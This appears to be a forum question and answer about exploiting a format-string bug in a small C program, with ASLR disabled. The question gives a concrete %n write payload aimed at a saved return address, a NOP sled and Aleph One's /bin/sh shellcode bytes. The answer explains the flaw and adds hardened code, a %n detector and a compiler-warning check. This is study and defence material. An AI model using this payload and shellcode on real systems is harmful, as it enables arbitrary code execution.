I'm running this in an environment with stack randomization disabled, and using the gcc version compatible with Aleph One's buffer overflow - that works great!
I'm trying to overwrite the instruction pointer register (eip) with the address of the array containing my shellcode. I always end up with a segmentation fault though. The following is the snippet I'm trying to exploit:
#include <stdio.h>

//Prints version
static void print_version(char *cmd)
{
    char txt[640 + 1];
    snprintf(txt, 640, "Submission program version 0.1 (%s)\n", cmd);
    printf(txt);   // txt (built from cmd) is used directly as the format string
}

int main(int argc, char **argv)
{
    (void)argc;
    print_version(argv[0]);   // argv[0] is the string handed over via execve()
    return 0;
}
I'm calling this function through execve(). The format string is the argv[0] here, which is successfully passed to the function above.
I'm using this format string:
\x0c\xdc\xbf\xffjunk\x0d\xdc\xbf\xffjunk\x0e\xdc\xbf\xffjunk\x0f\xdc\xbf\xff%8x%8x%120x%n%5x%n%230x%n%64x%n
followed by 200 NOPs, the shellcode, and the rest of the array filled with NOPs as well.
The shellcode is Aleph One's code:
static char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
Going back to the format string, I'm overwriting 4 addresses, 0xffbfdc0c to 0xffbfdc0f. 0xffbfdc0c is the saved eip address I found by setting a breakpoint on the print_version() function mentioned at the top.
I'm trying to replace it with the address 0xffbfdcd4, which is 150 bytes above the base address for txt[] array in print_version (counting the initial characters of the txt[] in the function and format string after that, hoping it may land somewhere in the NOPs preceding the shellcode).
I just end up with a segfault. I'm not sure how to proceed further, or how I should debug to see if it's actually overwriting the value at the intended address.
EDIT: Am I using the correct format string?
Could anyone also tell me how to check the address using gdb after my program has generated a segmentation fault, or right before the segfault but after the address has been changed?
Thanks.
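The root cause the question is working with is that print_version() passes attacker data (argv[0], copied into txt) as the format argument of printf, so "%x" reads the stack and "%n" writes a byte count to whatever address the corresponding argument slot holds. The following is an added example, not code from the question: it keeps the vulnerable function for comparison, shows the hardened version (format is a literal, the untrusted string is only ever a "%s" argument), and adds a small helper that counts conversion directives in an untrusted string so input containing "%n" can be flagged in validation or log review. The VERSION_FMT macro, version_line_safe() and count_format_directives() are names I made up for this example; the sample format string in the comments is the tail of the one in the question.

```c
/* Added example, not code from the question: the poster's vulnerable
 * print_version() next to a hardened version, plus a helper that counts the
 * conversion directives in an untrusted string so unexpected "%n" can be
 * flagged before the string ever reaches a printf-family format argument. */
#include <stdio.h>
#include <string.h>

#define VERSION_FMT "Submission program version 0.1 (%s)\n"

/* Vulnerable: cmd is copied into txt, then txt itself becomes the format,
 * so "%x" reads and "%n" writes embedded in cmd are executed by printf. */
static void print_version_vulnerable(const char *cmd)
{
    char txt[640 + 1];
    snprintf(txt, 640, VERSION_FMT, cmd);
    printf(txt);   /* the bug: attacker-controlled format string */
}

/* Hardened: the format is a literal and cmd is consumed only by "%s", so any
 * '%' in cmd is copied to the output verbatim. Returns the line in a static
 * buffer (not thread-safe; kept this way so the result can be checked
 * without printing). */
static const char *version_line_safe(const char *cmd)
{
    static char line[640 + 1];
    snprintf(line, sizeof line, VERSION_FMT, cmd);
    return line;
}

/* Counts printf conversions in s, skipping the literal "%%" escape.
 * If writes is non-NULL, stores how many of the conversions are "%n".
 * Example: "%8x%8x%120x%n%5x%n%230x%n%64x%n" -> 10 conversions, 4 writes. */
static int count_format_directives(const char *s, int *writes)
{
    int total = 0, n_writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                 /* "%%" is a literal percent sign */
        /* skip flags, width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p))
            p++;
        if (!*p)
            break;                    /* dangling '%' at end of string */
        total++;
        if (*p == 'n')
            n_writes++;
    }
    if (writes)
        *writes = n_writes;
    return total;
}

/* Convenience wrapper: number of "%n" write directives in s. */
static int count_n_writes(const char *s)
{
    int writes;
    count_format_directives(s, &writes);
    return writes;
}

int main(int argc, char **argv)
{
    const char *cmd = argc > 1 ? argv[1] : "demo";
    int writes = count_n_writes(cmd);
    if (count_format_directives(cmd, NULL) > 0)
        fprintf(stderr, "warning: argument contains format directives (%d are %%n)\n",
                writes);
    /* only the safe variant is called; the vulnerable one is kept for comparison */
    fputs(version_line_safe(cmd), stdout);
    (void)print_version_vulnerable;
    return 0;
}
```

Compiling the original with `gcc -Wformat -Wformat-security` also reports `printf(txt)` as "format not a string literal and no format arguments", which is the quickest static check for this class of bug in a code base.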